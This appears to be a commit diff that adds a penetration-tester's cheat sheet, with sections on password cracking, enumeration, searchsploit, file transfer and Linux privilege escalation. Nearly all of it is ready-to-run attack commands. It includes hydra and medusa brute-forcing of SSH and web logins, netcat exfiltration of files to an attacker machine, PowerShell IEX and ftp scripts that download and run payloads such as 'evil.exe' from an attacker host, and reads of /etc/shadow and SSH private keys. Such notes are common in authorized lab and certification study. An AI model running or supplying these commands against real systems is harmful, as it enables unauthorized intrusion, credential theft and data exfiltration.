adding clones

Crack

@@ -0,0 +1,55 @@
+
+Cewl
+cewl http://<targetip>/ -m 6 -w cewl.txt
+wc -l cewl.txt
+john --wordlist=cewl.txt --rules --stdout > mutated.txt
+wc mutated.txt
+medusa -h <targetip> -u admin -P mutated.txt -M http -n 80 -m DIR:/directory/to/login/panel -T 30
+
+-----------------------------------
+
+Hydra
+
+hydra -l root -P /usr/share/wordlısts/rockyou.txt <targetip> ssh
+hydra -L userlist.txt -P /usr/share/wordlısts/rockyou.txt <targetip> -s 22 ssh -V
+
+# crack web passwords
+http-post-form can change as user module changes
+Invalid: what message does the page give for wrong creds
+for parameters check with burp
+
+hydra -l admin -P /usr/share/seclists/Passwords/10k_most_common.txt <targetip> http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 64 
+
+-----------------------------------
+
+Medusa
+medusa -h <targetip> -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/test -T 10
+
+-----------------------------------
+
+Hashcat
+
+# learn the hash type from hashcat.net example hashes page and pass as its m value
+# or you can learn with the following command
+hashcat -h | grep -i lm
+hashcat -m 1600 hashes /usr/share/wordlists/rockyou.txt
+
+-----------------------------------
+
+LM/NTLM
+hashcat -h | grep -i lm 
+hashcat -m 3000  hashes --rules --wordlist=/usr/share/wordlists/rockyou.txt
+
+https://hashkiller.co.uk/
+
+------------------------------------------
+
+When you find some digits, check if it's 32 bit
+echo -n ....... | wc -c
+
+------------------------------------------
+John
+john hashes.txt --rules --wordlist=/usr/share/wordlists/rockyou.txt 
+
+
+

Enumeration

@@ -0,0 +1,110 @@
+NMAP
+
+# Alive hosts
+nmap -sn 10.0.0.0/24	
+
+# scan the 1024 most common ports, run OS detection, run default nmap scripts
+nmap -A -oA nmap <targetip>	
+
+# Scan more deeply, scan all 65535 ports on $targetip with a full connect scan
+nmap -v -sT <targetip> -p- 
+
+# more options
+nmap -sV -sC -v -A <targetip> -p- 
+nmap -sT -sV -A -O -v -p 1–65535 <targetip> 
+
+# my preference
+nmap -sV -sC -v -oA output <targetip>
+nmap -p- -v <targetip>
+
+
+------------------------
+
+SMB
+
+Port 139 and 445- SMB/Samba shares
+Samba is a service that enables the user to share files with other machines
+works the same as a command line FTP client, may browse files without even having credentials
+
+# Share List:
+smbclient --list <targetip>
+smbclient -L <targetip>
+
+# Check SMB vulnerabilities:
+nmap --script=smb-check-vulns.nse <targetip> -p445
+
+# basic nmap scripts to enumerate shares and OS discovery
+nmap -p 139,445 192.168.1.1/24 --script smb-enum-shares.nse smb-os-discovery.nse
+
+# Connect using Username
+root@kali:~# smbclient -L <targetip> -U username -p 445
+
+# Connect to Shares
+smbclient \\\\<targetip>\\ShareName
+smbclient \\\\<targetip>\\ShareName -U john
+
+# enumarete with smb-shares, -a “do everything” option
+enum4linux -a 192.168.1.120
+
+# learn the machine name and then enumerate with smbclient
+nmblookup -A 192.168.1.102
+smbclient -L <server_name> -I 192.168.1.105
+
+# rpcclient - Connect with a null-session (only works for older windows servers)
+rpcclient -U james 10.10.10.52
+rpcclient -U "" 192.168.1.105
+(press enter if asks for a password)
+rpcclient $> srvinfo
+rpcclient $> enumdomusers
+rpcclient $> enumalsgroups domain
+rpcclient $> lookupnames administrators
+rpcclient> querydominfo
+rpcclient> enumdomusers
+rpcclient> queryuser john
+
+# scan for vulnerabilities with nmap
+nmap --script "vuln" <targetip> -p139,445
+
+------------------------
+
+SMTP
+
+# telnet or netcat connection
+nc <targetip> 25
+VRFY root
+# Check for commands
+nmap -script smtp-commands.nse <targetip>
+
+------------------------
+
+Port 111 - RPC
+
+Rpcbind can help us look for NFS-shares. So look out for nfs. Obtain list of services running with RPC:
+
+rpcbind -p <targetip>
+rpcinfo –p x.x.x.x
+
+# using nmap, see which port NFS is listening
+locate *rpc*.nse
+nmap --script rpcinfo.nse <targetip> -p 111
+
+-------------------------
+
+NFS
+
+# to find the public share
+locate *nfs*.nse
+nmap --script nfs-showmount.nse <targetip>
+
+# mount the share to a folder under /tmp
+mkdir /tmp/nfs
+/sbin/mount.nfs <targetip>:/home/box /tmp/nfs
+
+
+
+
+
+
+
+
+

Exploit

@@ -0,0 +1,6 @@
+Searchsploit 
+# To view the file
+searchsploit -x php/webapps/41564.c
+
+# To see the full path of the file
+searchsploit -p php/webapps/41564.c

File Transfers - Linux

@@ -0,0 +1,58 @@
+Python SimpleHTTPServer
+
+#on Attacker
+python -m SimpleHTTPServer
+
+#on target
+wget <attackerip>:8000/filename
+
+
+------------------------------
+
+Apache
+
+#on Attacker
+cp filetosend.txt /var/www/html
+service apache2 start
+
+#on target
+wget http://attackerip/file
+curl http://attackerip/file > file
+fetch http://attackerip/file        # on BSD
+
+----------------------------------
+
+Netcat (From Target to Kali)
+
+# Listen on Kali
+nc -lvp 4444 > file
+
+# Send from Target machine
+nc <kali_ip> 4444 < file
+
+-----------------
+
+
+Netcat (From Kali to Target)
+
+# on target, wait for the file
+nc -nvlp 55555 > file
+
+# on kali, push the file
+nc $victimip 55555 < file
+
+
+----------------------
+
+Extra:
+To send the executable file to your machine:
+
+base64 executable
+# copy the output
+# paste it in a file called file.txt
+# decode it and create the executable
+base64 -d file.txt > executable
+
+
+
+

File Transfers - Windows

@@ -0,0 +1,71 @@
+
+--------------------------------------
+TFTP
+# Windows XP and Win 2003 contain tftp client. Windows 7 do not by default 
+# tfpt clients are usually non-interactive, so they could work through an obtained shell 
+
+atftpd --daemon --port 69 /tftp
+Windows> tftp -i 192.168.30.45 GET nc.exe
+
+--------------------------------------
+
+FTP (pyftpdlib client on Kali)
+# Ftp is generally installed on Windows machines
+# To make it interactive, use -s option
+
+# On Kali install a ftp client and set a username/password
+apt-get install python-pyftpdlib  
+python -m pyftpdlib -p 21
+
+# on Windows
+ftp <attackerip>
+> binary
+> get exploit.exe
+
+-------------------------------------------
+
+FTP (pureftpd client on Kali)
+
+# on Kali
+
+# install ftp client
+apt-get install pure-ftpd
+# create a group
+groupadd ftpgroup
+# add a user
+useradd -g ftpgroup -d /dev/null -s /etc ftpuser
+# Create a directory for your ftp-files (you can also specify a specific user e.g.: /root/ftphome/bob).
+mkdir /root/ftphome
+# Create a ftp-user, in our example "bob" (again you can set "-d /root/ftphome/bob/" if you wish).
+pure-pw useradd bob -u ftpuser -g ftpgroup -d /root/ftphome/
+# Update the ftp database after adding our new user.
+pure-pw mkdb
+# change ownership of the specified ftp directory (and all it's sub-direcotries) 
+chown -R ftpuser:ftpgroup /root/ftphome
+# restart Pure-FTPD
+/etc/init.d/pure-ftpd restart
+
+
+# On Windows
+echo open <attackerip> 21> ftp.txt
+echo USER username password >> ftp.txt
+echo bin >> ftp.txt
+echo GET evil.exe >> ftp.txt
+echo bye >> ftp.txt
+ftp -s:ftp.txt
+
+--------------------------------------
+
+Powershell
+echo $storageDir = $pwd > wget.ps1
+echo $webclient = New-Object System.Net.WebClient >>wget.ps1
+echo $url = "http://<attackerip>/powerup.ps1" >>wget.ps1
+echo $file = "powerup.ps1" >>wget.ps1
+echo $webclient.DownloadFile($url,$file) >>wget.ps1
+powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
+
+--------------------------------------
+# Powershell download a file
+powershell "IEX(New Object Net.WebClient).downloadString('http://<targetip>/file.ps1')"
+
+

Priv Esc - Linux

@@ -0,0 +1,72 @@
+
+# priv esc enumeration scripts
+https://github.com/rebootuser/LinEnum
+https://github.com/reider-roque/linpostexp/blob/master/linprivchecker.py
+http://pentestmonkey.net/tools/audit/unix-privesc-check
+
+# Kernel and OS
+uname -a
+uname -mrs
+cat /etc/issue
+cat /etc/lsb-release      # Debian based
+cat /etc/redhat-release   # Redhat based
+
+# running services and find services run boy root
+ps aux
+ps aux | grep root
+
+# which applications are installed
+dpkg -l
+ls -alh /usr/bin/
+ls -alh /sbin/
+
+# scheduled tasks
+crontab -l
+
+# port forwarding
+ssh -L 8080:127.0.0.1:80 root@192.168.1.7    # Local Port
+ssh -R 8080:127.0.0.1:80 root@192.168.1.7    # Remote Port
+
+# tunneling
+ssh -D 127.0.0.1:9050 -N [username]@[ip]
+proxychains ifconfig
+
+# sensitive files
+cat /etc/passwd
+cat /etc/group
+cat /etc/shadow
+ls -alh /var/mail/
+
+# check home dirs
+ls -ahlR /root/
+ls -ahlR /home
+
+# private key search
+cat ~/.ssh/authorized_keys
+cat ~/.ssh/identity.pub
+cat ~/.ssh/identity
+cat ~/.ssh/id_rsa.pub
+cat ~/.ssh/id_rsa
+cat ~/.ssh/id_dsa.pub
+cat ~/.ssh/id_dsa
+cat /etc/ssh/ssh_config
+cat /etc/ssh/sshd_config
+cat /etc/ssh/ssh_host_dsa_key.pub
+cat /etc/ssh/ssh_host_dsa_key
+cat /etc/ssh/ssh_host_rsa_key.pub
+cat /etc/ssh/ssh_host_rsa_key
+cat /etc/ssh/ssh_host_key.pub
+cat /etc/ssh/ssh_host_key
+
+
+# Sticky Bits & SUID & GUID
+
+find / -perm -1000 -type d 2>/dev/null   # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
+find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the group, not the user who started it.
+find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the owner, not the user who started it.
+find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID
+
+
+
+
+